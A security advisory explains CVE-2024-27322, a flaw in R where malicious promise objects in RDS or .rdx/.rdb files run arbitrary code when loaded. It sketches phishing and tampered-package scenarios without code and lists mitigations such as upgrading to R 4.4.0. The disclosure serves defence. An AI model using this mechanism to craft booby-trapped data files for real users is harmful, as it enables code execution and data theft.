A significant security vulnerability has been identified in the R programming language, designated as CVE-2024-27322.
This flaw allows for arbitrary code execution following the deserialization of untrusted data, presenting a substantial risk to data security and application integrity.
The vulnerability is related to the use of RDS (R Data Serialization) format files and .rdx files, common in R programming for data serialisation.
By creating malicious RDS or .rdx files, an attacker can execute arbitrary commands on a target system, potentially leading to unauthorised access, data exfiltration, or further network penetration.
What Is ‘R’ Used For?
“R is a free software environment for statistical computing and graphics. It compiles and runs on a wide variety of UNIX platforms, Windows and MacOS.” - The R Project
R is a programming language and software environment used for statistical computing and graphics, and is utilised in many of the same ways as Python.
It is widely employed by statisticians, data scientists, and researchers for data analysis, data visualisation, and statistical modelling.
R offers a vast ecosystem of packages for tasks like data manipulation, machine learning, and exploratory analysis.
Its flexibility and extensive libraries make it a popular choice for academic research, business analytics, and data-driven decision-making across various industries.
How Could CVE-2024-27322 Be Exploited?
Malicious RDS Files
Data scientists in large organisations frequently collaborate with external partners.
Through social engineering, they could receive an email from a threat actor posing as a known contact, offering a data set for analysis in the form of an RDS file.
If the data scientist opens the RDS file in their R environment, a promise expression will be evaluated, triggering the arbitrary code execution.
The malicious code could then perform a range of harmful actions.
To put this into perspective, R could be used for Uber data analysis. If a data set is compromised but undetected, the data analysis may continue for years.
The financial and reputational damage that could be caused if this was revealed would be immense, and could even be used for a ransom.
Compromised R Package from a Third-Party Repository
The above example was regarding an enterprise level project, but its severity is not limited to large projects.
If a junior data analyst was learning R, they may experiment with several third party R packages not found on CRAN or other official sources.
A package containing .rdx and .rdb files that have been manipulated to include malicious promise objects could be used.
When the developer installs the package, the R implementation loads these files, inadvertently executing the malicious code. This could potentially lead to their sensitive date being released, or sold.
However, it could also affect the integrity of any project they work on in the future, including enterprise level projects that allow people to work on their own devices.
Mitigation Strategies
To mitigate this vulnerability, users should take the following steps:
Apply Updates: R Project has released R Core Version 4.4.0, which addresses the vulnerability by restricting the use of promises in the serialisation stream. All users should update to this version as soon as possible.
Secure or Sandbox RDS File Usage: To reduce the risk of code execution from untrusted sources, consider using sandboxing or containerization for working with third-party RDS, .rdb, or .rdx files. This approach provides an extra layer of security and minimises potential damage.
More information about the current vulnerability and ways to mitigate it can be found here in an article from Carnegie Mellon University.
To stay updated with more alerts click here.
Further Reading